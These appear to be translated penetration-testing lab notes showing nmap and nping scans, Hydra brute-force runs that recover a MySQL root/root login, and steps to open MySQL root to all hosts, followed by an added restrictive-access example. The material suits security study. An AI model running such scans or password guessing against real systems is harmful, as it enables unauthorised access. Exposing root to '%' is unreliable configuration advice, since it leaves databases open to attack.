nmap:
Basic usage
-A scan for OS information and perform a traceroute
-O detect operating system information
-v more verbose information about the remote machine
-sA detect whether the host is behind a packet filter or firewall
-PN scan the host to check whether it is protected by a firewall (-PN is the legacy spelling of -Pn)
-sP find the live hosts on the network (now -sn)
-F run a fast scan
-r scan ports in sequential order
-sN run a TCP Null scan to get past the firewall
-sS run a stealthy (SYN) scan
Hands-on:
nmap -sP 127.0.0.1 // find the live hosts on the network
nping --echo-client "public" echo www.baidu.com // watch how the data is sent on the connection to Baidu
nping --tcp -p 445 -d AF56A43D 192.168.41.136 // view the TCP exchange between 192.168.41.234 and 192.168.41.136; sending packets to a chosen port simulates some common network attacks. Note that -d is nping's debug-level option, so AF56A43D was parsed as a second target hostname (see "Statistics for host AF56A43D" in the output below).
Starting Nping 0.7.60 ( https://nmap.org/nping ) at 2018-01-03 10:03 CST
BPF-filter: (not src host 192.168.165.128 and dst host 192.168.165.128) and ((tcp and dst port 57666) or (icmp and (icmp[icmptype] = 3 or icmp[icmptype] = 4 or icmp[icmptype] = 5 or icmp[icmptype] = 11 or icmp[icmptype] = 12)) )
SENT (20.1628s) TCP [192.168.165.128:57666 > 202.77.49.113:445 S seq=3235973801 win=1480 csum=0x99A8] IP [ttl=64 id=60933 proto=6 csum=0x2ae3 iplen=40 ]
SENT (21.1656s) TCP [192.168.165.128:57666 > 192.168.0.54:445 S seq=3235973801 win=1480 csum=0xD488] IP [ttl=64 id=60933 proto=6 csum=0x65c3 iplen=40 ]
RCVD (21.1666s) TCP [192.168.0.54:445 > 192.168.165.128:57666 SA seq=1065185696 win=64240 csum=0x1675 <mss 1460>] IP [ttl=128 id=65262 proto=6 csum=0x14d6 iplen=44 ]
SENT (22.1680s) TCP [192.168.165.128:57666 > 202.77.49.113:445 S seq=3235973801 win=1480 csum=0x99A8] IP [ttl=64 id=60933 proto=6 csum=0x2ae3 iplen=40 ]
SENT (23.1716s) TCP [192.168.165.128:57666 > 192.168.0.54:445 S seq=3235973801 win=1480 csum=0xD488] IP [ttl=64 id=60933 proto=6 csum=0x65c3 iplen=40 ]
RCVD (23.1728s) TCP [192.168.0.54:445 > 192.168.165.128:57666 SA seq=954087523 win=64240 csum=0x5651 <mss 1460>] IP [ttl=128 id=65263 proto=6 csum=0x14d5 iplen=44 ]
SENT (24.1747s) TCP [192.168.165.128:57666 > 202.77.49.113:445 S seq=3235973801 win=1480 csum=0x99A8] IP [ttl=64 id=60933 proto=6 csum=0x2ae3 iplen=40 ]
SENT (25.1785s) TCP [192.168.165.128:57666 > 192.168.0.54:445 S seq=3235973801 win=1480 csum=0xD488] IP [ttl=64 id=60933 proto=6 csum=0x65c3 iplen=40 ]
RCVD (25.1797s) TCP [192.168.0.54:445 > 192.168.165.128:57666 SA seq=797395120 win=64240 csum=0x4F5B <mss 1460>] IP [ttl=128 id=65264 proto=6 csum=0x14d4 iplen=44 ]
SENT (26.1812s) TCP [192.168.165.128:57666 > 202.77.49.113:445 S seq=3235973801 win=1480 csum=0x99A8] IP [ttl=64 id=60933 proto=6 csum=0x2ae3 iplen=40 ]
SENT (27.1844s) TCP [192.168.165.128:57666 > 192.168.0.54:445 S seq=3235973801 win=1480 csum=0xD488] IP [ttl=64 id=60933 proto=6 csum=0x65c3 iplen=40 ]
RCVD (27.1855s) TCP [192.168.0.54:445 > 192.168.165.128:57666 SA seq=577307344 win=64240 csum=0xA259 <mss 1460>] IP [ttl=128 id=65265 proto=6 csum=0x14d3 iplen=44 ]
SENT (28.1892s) TCP [192.168.165.128:57666 > 202.77.49.113:445 S seq=3235973801 win=1480 csum=0x99A8] IP [ttl=64 id=60933 proto=6 csum=0x2ae3 iplen=40 ]
SENT (29.1926s) TCP [192.168.165.128:57666 > 192.168.0.54:445 S seq=3235973801 win=1480 csum=0xD488] IP [ttl=64 id=60933 proto=6 csum=0x65c3 iplen=40 ]
RCVD (29.1934s) TCP [192.168.0.54:445 > 192.168.165.128:57666 SA seq=1096559906 win=64240 csum=0x5914 <mss 1460>] IP [ttl=128 id=65267 proto=6 csum=0x14d1 iplen=44 ]
Statistics for host AF56A43D (202.77.49.113):
| Probes Sent: 5 | Rcvd: 0 | Lost: 5 (100.00%)
|_ Max rtt: N/A | Min rtt: N/A | Avg rtt: N/A
Statistics for host 192.168.0.54:
| Probes Sent: 5 | Rcvd: 5 | Lost: 0 (0.00%)
|_ Max rtt: 0.985ms | Min rtt: 0.097ms | Avg rtt: 0.691ms
Raw packets sent: 10 (400B) | Rcvd: 5 (230B) | Lost: 5 (50.00%)
Tx time: 9.03115s | Tx bytes/s: 44.29 | Tx pkts/s: 1.11
Rx time: 9.03178s | Rx bytes/s: 25.47 | Rx pkts/s: 0.55
root@kali2:~# nmap 192.168.0.54
Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-03 10:09 CST
Nmap scan report for 192.168.0.54
Host is up (1.0s latency).
Not shown: 992 closed ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
514/tcp filtered shell
902/tcp open iss-realsecure
912/tcp open apex-mesh
3306/tcp open mysql
Nmap done: 1 IP address (1 host up) scanned in 20.61 seconds
root@kali2:~# nmap -p 1-1000 192.168.0.54 // scan ports 1-1000; individual ports can also be given
Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-03 10:11 CST
Nmap scan report for 192.168.0.54
Host is up (1.3s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
514/tcp filtered shell
902/tcp open iss-realsecure
912/tcp open apex-mesh
Nmap done: 1 IP address (1 host up) scanned in 25.54 seconds
root@kali2:~# nmap -A 192.168.0.54 // scan OS information and traceroute
Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-03 10:13 CST
Nmap scan report for 192.168.0.54
Host is up (0.36s latency).
Not shown: 992 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2j PHP/5.4.45)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45
|_http-title: Index of /
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
514/tcp filtered shell
902/tcp open ssl/vmware-auth VMware Authentication Daemon 1.10 (Uses VNC, SOAP)
912/tcp open vmware-auth VMware Authentication Daemon 1.0 (Uses VNC, SOAP)
3306/tcp open mysql MySQL (unauthorized)
Device type: general purpose
Running: Microsoft Windows XP|7|2012
OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_server_2012
OS details: Microsoft Windows XP SP3, Microsoft Windows XP SP3 or Windows 7 or Windows Server 2012
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_smb2-security-mode: ERROR: Script execution failed (use -d to debug)
|_smb2-time: ERROR: Script execution failed (use -d to debug)
TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 0.22 ms 192.168.165.2
2 -- 192.168.0.54
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 117.60 seconds
Hydra:
Failed example: the cause is that MySQL did not allow other IPs to connect on 3306
Hydra (http://www.thc.org/thc-hydra) starting at 2018-01-03 10:29:08
[INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 1 task per 1 server, overall 1 task, 1 login try (l:1/p:0), ~1 try per task
[DATA] attacking mysql://192.168.0.54:3306/
[ATTEMPT] target 192.168.0.54 - login "root" - pass "root" - 1 of 0 [child 1] (0/0)
[ERROR] Host 'Andy-Computer' is not allowed to connect to this MySQL server
1 of 1 target completed, 0 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2018-01-03 10:29:19
<finished>
Successful example: the connection to port 3306 went through
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2018-01-03 10:45:55
[DATA] max 1 task per 1 server, overall 1 task, 1 login try (l:1/p:0), ~1 try per task
[DATA] attacking mysql://192.168.0.54:3306/
[INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)
[ATTEMPT] target 192.168.0.54 - login "root" - pass "root" - 1 of 0 [child 1] (0/0)
[3306][mysql] host: 192.168.0.54 login: root password: root
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2018-01-03 10:45:56
<finished>
There is one more reason brute-forcing can fail: too many failed connections get the client host blocked
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
[DEBUG] Output color flag is 0
Hydra (http://www.thc.org/thc-hydra) starting at 2018-01-03 10:49:13
[DEBUG] cmdline: /usr/bin/hydra -s 3306 -V -d -l root -p root -t 30 -w 15 192.168.0.54 mysql
[INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[VERBOSE] More tasks defined than login/pass pairs exist. Tasks reduced to 1
[DATA] max 1 task per 1 server, overall 1 task, 1 login try (l:1/p:0), ~1 try per task
[DATA] attacking mysql://192.168.0.54:3306/
[VERBOSE] Resolving addresses ...
[DEBUG] resolving 192.168.0.54
[VERBOSE] resolving done
[DEBUG] Code: attack Time: 1514947763
[DEBUG] Options: mode 0 ssl 0 restore 0 showAttempt 1 tasks 1 max_use 1 tnp 0 tpsal 0 tprl 0 exit_found 0 miscptr (null) service mysql
[DEBUG] Brains: active 0 targets 1 finished 0 todo_all 1 todo 0 sent 1 found 0 countlogin 0 sizelogin 0 countpass 0 sizepass 0
[DEBUG] Target 0 - target 192.168.0.54 ip 192.168.0.54 login_no 0 pass_no 0 sent 0 pass_state 0 redo_state 0 (0 redos) use_count 0 failed 0 done 0 fail_count 0 login_ptr (null) pass_ptr (null)
[DEBUG] Task 0 - pid 0 active 0 redo 0 current_login_ptr (null) current_pass_ptr (null)
[DEBUG] Tasks 1 inactive 0 active
[DEBUG] child 0 got target 0 selected
[DEBUG] child 0 spawned for target 0 with pid 6373
[DEBUG] head_no 0 has pid 6373
[DEBUG] head_no[0] read n
[DEBUG] send_next_pair_init target 0, head 0, redo 0, redo_state 0, pass_state 0. loop_mode 0, curlogin (null), curpass (null), tlogin root, tpass root, logincnt 0/0, passcnt 1/0, loop_cnt 0
[DEBUG] send_next_pair_mid done 1, pass_state 0, clogin root, cpass root, tlogin -p, tpass root, redo 0
[ATTEMPT] target 192.168.0.54 - login "root" - pass "root" - 1 of 0 [child 1] (0/0)
DEBUG_CONNECT_OK
[DEBUG] SEND [pid:6373] (5 bytes):
0000: 0100 0000 01 [ ..... ]
DEBUG_DISCONNECT
[DEBUG] SEND [pid:6373] (5 bytes):
0000: 0100 0000 01 [ ..... ]
DEBUG_DISCONNECT
[DEBUG] pid 6373 called child_exit with code 0
[DEBUG] head_no[0] read Q
[DEBUG] child 0 reported it quit
[DEBUG] head_no 0, kill 1, fail 0
[VERBOSE] using default db 'mysql'
DEBUG_RECV_BEGIN|k|END[0A]
[ERROR] Host 'Andy-Computer' is blocked because of many connection errors; unblock with 'mysqladmin flush-hosts'
[ERROR] Failed to connect to database: Host 'Andy-Computer' is blocked because of many connection errors; unblock with 'mysqladmin flush-hosts'
[DEBUG] child 0 got target 0 selected
[DEBUG] child 0 spawned for target 0 with pid 6374
[DEBUG] head_no 0 has pid 6374
[DEBUG] head_no[0] read n
[STATUS] attack finished for 192.168.0.54 (waiting for children to complete tests)
[DEBUG] head_no 0, kill 1, fail 0
[DEBUG] all targets done and all heads finished
[DEBUG] while loop left with 1
1 of 1 target completed, 0 valid passwords found
[DEBUG] killing all remaining children now that might be stuck
Hydra (http://www.thc.org/thc-hydra) finished at 2018-01-03 10:49:24
<finished>
Port 3306 issues
First: in the "mysql" database's "user" table, change the "host" column from 'localhost' to '%'. Or add a new record with "host" set to the IP address that needs access, and grant privileges. Restart the MySQL service.
Second: add an exception for port 3306 in the system firewall and allow it.
Error message:
ERROR 1130: Host '192.168.1.3' is not allowed to connect to this MySQL server
Solutions:
1. Change the table. Your account is probably not allowed to log in remotely, only from localhost. In that case, on the localhost machine, log in to MySQL and change the "host" column of the "user" table in the "mysql" database from "localhost" to "%"
1. mysql -u root -pvmware
mysql>use mysql;
mysql>update user set host = '%' where user = 'root';
mysql>flush privileges; // reload the grant tables so the direct UPDATE takes effect
mysql>select host, user from user;
2. Grant method. For example, if you want myuser to connect to the MySQL server from any host using mypassword:
GRANT ALL PRIVILEGES ON *.* TO 'myuser'@'%' IDENTIFIED BY 'mypassword' WITH GRANT OPTION;
If you want to allow user myuser to connect to the MySQL server only from the host with IP 192.168.1.3, using mypassword as the password:
GRANT ALL PRIVILEGES ON *.* TO 'myuser'@'192.168.1.3' IDENTIFIED BY 'mypassword' WITH GRANT OPTION;
3. Add port 3306 to the exceptions of the Windows built-in firewall
Summary:
mysql -u root -p // log in to MySQL as the privileged user root
mysql>use mysql; // select the mysql database
mysql>select host from user where user='root'; // check the host value in the user table of the mysql database (the hosts/IPs allowed to connect)
mysql>update user set host = '%' where user ='root'; // change the host value (the wildcard % admits any host/IP); a specific IP address can be given instead
mysql>flush privileges; // reload MySQL's privilege tables
mysql>select host from user where user='root'; // query the user table again and the change is visible
Restart the MySQL service to finish.
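As an added example (not from these notes), the same remote-access change done the restrictive way: a dedicated account bound to one client address instead of opening root to '%', the check that confirms it, and the server-side view of the "blocked because of many connection errors" state that stopped the third Hydra run above. The database name appdb, the placeholder password and the client address 192.168.1.3 are assumptions.

```sql
-- Added example: grant remote access to one client only, then verify.
-- Assumed names: appdb (database), 'myuser'@'192.168.1.3' (account),
-- 'CHANGE_ME_placeholder' (password placeholder).
-- Works on MySQL 5.7 and 8.0; CREATE USER + GRANT replaces the older
-- GRANT ... IDENTIFIED BY form used above, which MySQL 8.0 no longer accepts.
CREATE USER 'myuser'@'192.168.1.3' IDENTIFIED BY 'CHANGE_ME_placeholder';
GRANT SELECT, INSERT, UPDATE, DELETE ON appdb.* TO 'myuser'@'192.168.1.3';
-- FLUSH PRIVILEGES is only needed after editing mysql.user directly with
-- UPDATE (as in the notes above); CREATE USER and GRANT apply immediately.

-- Verify: root should still be localhost-only, myuser bound to one address.
-- Any row with host = '%' is reachable from every address the firewall lets in.
SELECT user, host FROM mysql.user WHERE user IN ('root', 'myuser');

-- The "blocked because of many connection errors" state: MySQL counts
-- interrupted handshakes per client host and refuses that host once the
-- count reaches max_connect_errors. This is the condition the third Hydra
-- run above reported for 'Andy-Computer'.
SHOW VARIABLES LIKE 'max_connect_errors';
SELECT ip, host, sum_connect_errors, count_handshake_errors
  FROM performance_schema.host_cache;

-- Clearing the block is the same action the error message names
-- (mysqladmin flush-hosts); it requires the RELOAD privilege on the server.
-- Since MySQL 8.0.23 the preferred form is
-- TRUNCATE TABLE performance_schema.host_cache;
FLUSH HOSTS;
```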